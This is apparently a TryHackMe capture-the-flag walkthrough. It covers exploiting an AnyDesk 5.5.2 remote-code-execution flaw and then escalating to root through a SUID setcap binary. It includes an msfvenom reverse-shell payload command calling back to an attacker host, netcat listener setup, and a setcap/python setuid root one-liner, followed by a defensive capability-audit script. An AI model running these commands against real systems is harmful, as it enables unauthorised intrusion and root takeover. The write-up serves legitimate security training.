TryHackMe : Annie (Hacking AnyDesk Application)

#$ubh@nk@r
4 min read · Jun 29, 2023

Intro : This is a Medium-level machine on TryHackMe. Here we will find an ‘AnyDesk’ application, which we have to compromise to get user access, and then do PrivEsc with the ‘setcap’ binary. So let’s start.

Nmap Scan :

As usual, we start with an Nmap scan to find open ports. Here 2 ports are open : 22 (ssh) and 7070 (realserver).

Tip : nmap -sT -p- -Pn -T4 <ip> -vv

I didn’t know what application was running on port 7070, so I ran an Nmap service version scan. And I got this.

Tip : nmap -sVC -Pn -p 7070 -T4 <ip> -vv

So it is running ‘AnyDesk Client’, but no version is specified. I searched Google for an AnyDesk exploit and I got this.

Exploit AnyDesk :

Version 5.5.2 is vulnerable to RCE. So I started testing blindly on that port, as we don’t know the exact version.

For this we have to generate shellcode with ‘msfvenom’.

Tip : msfvenom -p linux/x64/shell_reverse_tcp LHOST=<tun0_ip> LPORT=<port> -b '\x00\x25\x26' -f python -v shellcode

You will get an Output like this.

Now replace the shellcode you find in that exploit with this one. Also change the IP to the victim’s IP address. The port stays the same.

Now save the exploit and start your Netcat listener on the port you set as LPORT in ‘msfvenom’. Then run the exploit with python2 (python3 will not work).

User Access :

And after some time I got a shell.

I am now the ‘annie’ user. Then I upgraded the shell, as this one is not properly usable.

Tip1 : python3 -c 'import pty; pty.spawn("/bin/bash")'

ctrl+Z

stty raw -echo;fg

export TERM=xterm (Press Enter)

And I got the user flag. From this we can tell the version is 5.5.2; that’s why the exploit worked.

Privilege Escalation :

So it’s time for some PrivEsc.

I tried ‘sudo -l’, but we have no password. Then I fired up my weapon : ‘Linpeas’.

After some time I found an interesting SUID binary : setcap.

Interesting!!! With this I can set any type of capability on a file, and eventually on a python binary, which helps us get root.

I found an Interesting Blog here about this PrivEsc.

So I decided to set a capability on the python3 binary. I copied the python3 binary into my folder and typed the following command to set the capability.

Tip : setcap cap_setuid+ep /usr/bin/python3

This sets the cap_setuid capability on that binary. You can check whether the capability is set using this command.

Tip : getcap -r / 2>/dev/null

After that I ran the following command mentioned in that blog.

Tip : ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

As soon as I ran the command, I got a root prompt.
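From the defender's side, the two conditions this escalation relied on can be audited: a setuid setcap binary, and files that carry cap_setuid or similar capabilities. The script below is an added example, not part of the original write-up; the RISKY_CAPS list, the function names and the sample getcap lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example. On a real host:
#   getcap -r / 2>/dev/null | flag_risky_caps
#   suid_paths "$(command -v setcap)"

# Capabilities commonly treated as root-equivalent (assumed list, edit to taste).
RISKY_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_sys_admin|cap_sys_module|cap_setfcap'

# Read getcap output on stdin and print "path<TAB>caps" for risky entries.
# Accepts both "path = cap_x+ep" and "path cap_x=ep" output styles.
# Assumes paths contain no spaces.
flag_risky_caps() {
  awk -v risky="$RISKY_CAPS" '
    {
      hit = ""; sep = ""
      for (i = 2; i <= NF; i++) {
        clause = $i
        if (clause == "=") continue              # separator in the "path = caps" style
        if (clause ~ /^=[eip]+$/) {              # empty name list means every capability
          if (clause ~ /[ep]/) { hit = "ALL"; sep = "," }
          continue
        }
        n = match(clause, /[+=][eip]+$/)         # names end where the flag letters start
        if (n == 0) continue
        if (substr(clause, n + 1) !~ /[ep]/) continue  # inheritable-only grants nothing alone
        m = split(substr(clause, 1, n - 1), names, ",")
        for (j = 1; j <= m; j++)
          if (names[j] ~ ("^(" risky ")$")) { hit = hit sep names[j]; sep = "," }
      }
      if (hit != "") print $1 "\t" hit
    }'
}

# Print each given path that is a regular file with the setuid bit set.
# setcap should never show up here.
suid_paths() {
  for p in "$@"; do
    [ -f "$p" ] && [ -u "$p" ] && printf '%s\n' "$p"
  done
  return 0
}

# Constructed sample of getcap output, mixing both output styles.
sample_getcap_output() {
  printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' '/usr/bin/python3 = cap_setuid+ep' \
    '/usr/bin/mtr-packet cap_net_raw=ep' '/opt/tool =ep' \
    '/usr/bin/perl cap_net_raw,cap_setuid=eip' '/usr/bin/gst-helper cap_sys_admin+i'
}

sample_getcap_output | flag_risky_caps
```

Any hit from either function is worth investigating; a setuid setcap in particular should have the bit removed.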

Yaaa!!! And we completed the room. Hope you learned something new here.

THANKS FOR READING !!

Happy Hacking~


Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
